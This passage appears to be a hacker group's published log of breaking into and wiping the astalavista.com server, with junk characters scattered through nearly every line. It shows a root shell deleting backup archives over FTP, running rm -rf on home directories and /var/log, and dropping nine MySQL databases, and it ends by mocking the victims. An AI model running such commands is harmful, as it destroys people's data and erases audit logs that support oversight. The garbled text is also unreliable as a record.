# B) X7 e6 {: D& n150 Opening BINARY mode data connection for ‘file list’.
+ D9 m3 s! K8 f. Mdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
! V3 c, `) a' T8 N6 R7 K226 Transfer complete.
! ]& @1 ~2 f1 X9 G6 _5 }# W; V: R) Tftp> cd astalavista.com+ l# d' V; i$ z" D0 l
250 CWD command successful.
: l9 r, z( {1 h- J4 cftp> ls -la
0 m$ `+ J! x$ w9 v) q/ A227 Entering Passive Mode (212,254,194,163,2,189)9 V1 b0 f% i1 N8 B
150 Opening BINARY mode data connection for ‘file list’.
5 m/ X* Y; [! [- R( F P-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
! X: m) c9 A- G; D& @-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2, I2 f) q# F) t/ b3 ^
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2, }5 @' P+ F4 r h
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
6 V3 F2 w- y; n1 W/ {-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
3 ~: B9 U1 P: C$ K: m4 |[snip]
- B$ R3 ?2 ^" Y" T6 h7 a226 Transfer complete.
, n. k1 v* K( d6 qftp> mdelete *
2 r! G; n. ~" Z6 ]* Zftp> ls -la- a+ d& N: l* i. f0 S" L7 K: j
227 Entering Passive Mode (212,254,194,163,2,193)
* C) c0 Z- N) c2 j150 Opening BINARY mode data connection for ‘file list’.1 ?% X2 M8 h r: T) H
226 Transfer complete.
2 O# T$ O* F6 m: s* }4 f0 S$ r2 Wftp>$ b! \8 g9 M, T* Y/ j- ?1 x
! ?6 S! z$ I7 K, k8 W) }) Fsh-3.2# cd /home% m4 E9 [( S/ Y( |$ o( W7 t9 Q! H
sh-3.2# ls -la9 r3 \$ w; O0 k- k4 H' x J' H2 V
total 120: S1 ^! I/ _- @
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .) m* t9 z, X4 J" X; V- n
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..6 G; ?3 o4 N! A) }$ [" {9 p) ]( m
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
4 Y5 ?" H0 x* f' m0 T) K1 x r% k& K, Z-rw——- 1 root root 8192 Jun 4 03:03 aquota.group" b0 j: ^9 g g! i
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
" |3 c3 A5 S' _4 v5 c$ n0 W! {# Vdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet# N& e0 Z% X; a: G, l) R. ?3 V
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
0 m* V: w) n7 q/ } j) hdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
9 ?$ W% H6 }/ i" p6 Z+ B) g9 g0 udrwx–x–x 10 com com 4096 Apr 28 12:40 com
5 F8 s5 `! }$ W6 j3 }8 Q$ [drwxr-xr-x 2 root root 4096 May 17 2007 ftp
$ i! `5 i- q4 u0 _drwx—— 3 jon jon 4096 Sep 21 2007 jon
1 B9 B+ W% `, pdrwx—— 2 root root 16384 Sep 11 2007 lost+found7 Y" s4 ?; f& y3 P! y% r1 G( _
drwxr-xr-x 2 root root 4096 Sep 14 2007 my( o$ B7 _& r$ T' T4 e
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
; V& w- E- [( Ndrwx—— 2 jon jon 4096 Sep 15 2007 test' ^; l4 n, t& J
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp" p: F- [# z: _% h; O- U8 ^# I
4 |- e/ D/ u; V `7 J0 g& a0 C
sh-3.2# rm -rf backup/
3 v4 Z5 V9 s. G0 c) t( L0 |sh-3.2# rm -rf backup.14161/
" V% \% h6 ~4 N) `+ qsh-3.2# rm -rf ftp/6 C6 e, n/ c) f6 v
sh-3.2# rm -rf jon/
2 Q1 F/ @2 T3 Msh-3.2# rm -rf my/+ n% W% @7 G W" q' s
sh-3.2# rm -rf mysqldata/
' b' r7 g8 @" p4 J' k4 {$ i2 {sh-3.2# rm -rf test/& n( Y( D3 }0 ]6 v6 J
sh-3.2# rm -rf tmp/0 G% X$ Y+ c7 Q5 E
sh-3.2# cd ~, i6 a/ h6 d, ?
sh-3.2# rm -rf *
' _9 ]& A# Q( @sh-3.2# rm -rf /var/log/
9 O' X! {* ?+ i3 r* E/ ^rm: cannot remove directory `/var/log//proftpd’: Directory not empty
6 H9 n: Z: m/ s/ f2 U; M3 Msh-3.2# rm -rf /home/*# v' N+ E. Y3 g, Z( j! J, N
sh-3.2# mysql/ ?# }' D$ J2 @) P3 ?1 U0 B
Welcome to the MySQL monitor. Commands end with ; or \g.: J# E2 }# r: n; g* P9 f
Your MySQL connection id is 407156( _( t; W5 p$ d- `. H$ [
Server version: 5.0.45-community-log MySQL Community Edition (GPL)6 V0 \: Y' [2 |# i0 ^6 F
5 J, Y, ^ ^0 ~5 a7 f5 F' H, g1 {Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
% L) `2 p- p9 d7 C5 G- G8 ^, d
* t; k1 S/ g% P" X C( f4 _mysql> show databases;
' T T7 P) n' o" u. _+———————–+
0 {; g2 R2 e1 a7 u| Database |" J- B9 o1 o. z1 S. J
+———————–+, N8 h, O. y' U/ N
| information_schema |
; f. \ n5 Y6 b) N| astanet_ads |" K2 a; h8 G/ ^; G" U+ r
| astanet_mailing_lists |& E9 T$ G x7 r! }* {
| astanet_mediawiki |1 {9 g2 [# T, w8 Y
| astanet_membersystem |& E' ]+ U; d u9 ^; s& R
| com_contrexx |& _4 U* D9 k2 f: r, v9 Q
| com_contrexx2 |* T) I U* r E# k6 L9 y& s
| com_contrexx2_live |
3 u- L8 b& O9 h9 B7 \& P| da_roundcube |
4 N' Q$ j0 j4 Z" T2 M o| dolphin |3 |3 m+ ~* m4 K
| ideapool |8 k1 k' a0 |$ Z g% A
| mysql |
% \, I3 u F( b- C- I| test |
8 @, S, n" B' f, { f+ x) a+ [. x| yourmaster |1 O, J( j a- G. T$ y
+———————–+3 Y6 [0 \! |0 J7 ]7 J2 \
14 rows in set (0.03 sec)
]4 v+ M( R( E! y* ]; d" ^1 D. o
[9 @( B6 D) Wmysql> drop database astanet_membersystem;
1 w" U6 p% s. {8 h* ?% X& WdroQuery OK, 46 rows affected (0.81 sec)( ?; Y }$ H" y
6 P- }) N( O. Z+ Omysql> drop database com_contrexx;
; b3 L2 W9 [% x$ aQuery OK, 211 rows affected (2.72 sec)
$ Z. B+ f7 F6 Q6 F% {0 v) l2 H" x2 G# a
mysql> drop database com_contrexx2;
& W# u) r$ D; L" l8 Z& X% nQuery OK, 237 rows affected (2.23 sec)) \$ t6 Y7 f* `% ?! ]
" [. b8 s; K3 C8 k
mysql> drop database com_contrexx2_live;
& u9 G2 k; Z1 s4 n4 }Query OK, 227 rows affected (7.63 sec)
& u3 R! G X* x5 c! G! l& `: |1 e. ]5 X
mysql> drop database ideapool;
, d6 n" k* N2 q$ @9 ?' ]% @ S+ s, pQuery OK, 69 rows affected (0.19 sec)3 A$ O0 H+ `6 c: g, R
5 ^2 p! c4 @7 K+ [
mysql> drop database yourmaster;
, c, N% ~: U& g4 p& w9 t [5 YQuery OK, 158 rows affected (0.55 sec)
6 N5 {' [ h# @$ @" z; w- D! d5 ?4 z, `: c( o3 o, r" z+ z
mysql> drop database astanet_ads;
- ?+ K* A( p" T" }Query OK, 9 rows affected (0.11 sec)9 g. v _0 L9 H3 d: ^) |
5 }- u8 J# b; K, L4 n }7 |# qmysql> drop database astanet_mailing_lists;
) x" e( n* C( O0 YQuery OK, 24 rows affected (1.47 sec)! o4 G2 O, T) a
$ D; [ r2 L. V4 {mysql> drop database astanet_mediawiki;- V" w% Z$ b* L2 `
Query OK, 31 rows affected (0.51 sec), J0 h5 |5 d4 z& k! r- j* C3 ~5 L
: s7 b. {8 e3 E( n, ~
mysql> show databases;
$ o* a7 `9 x- I- A- y& b+ A! H+——————–+5 `$ A2 d2 W/ E( j
| Database |$ M8 E+ e* G7 x5 i v. f
+——————–+
' |) B) X' D8 D* i# l0 Q| information_schema |- I% g3 k% f: z! |
| da_roundcube |$ f/ g: }1 W3 K" J
| dolphin |$ o; V$ r9 b! {) E
| mysql |/ H) T( j; v$ e% }7 u7 |. ~
| test |& o3 E# z0 O5 T: w
+——————–++ m4 ?( s1 E% {8 I1 i, _
5 rows in set (0.00 sec)
- u" D' v* w" _4 R$ S0 q$ y& @& W* r" V* B; S$ z
What a journey! We’re not sure exactly why the “Terminator” had any influence on4 m4 D$ x$ y- H- _7 z$ w* T5 V0 e0 j8 E
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
. N& G2 |: @! y6 \6 vwrong to say this pack of morons *wont be back*.
2 D8 Q& R" v/ n) N4 _3 W& E8 ` |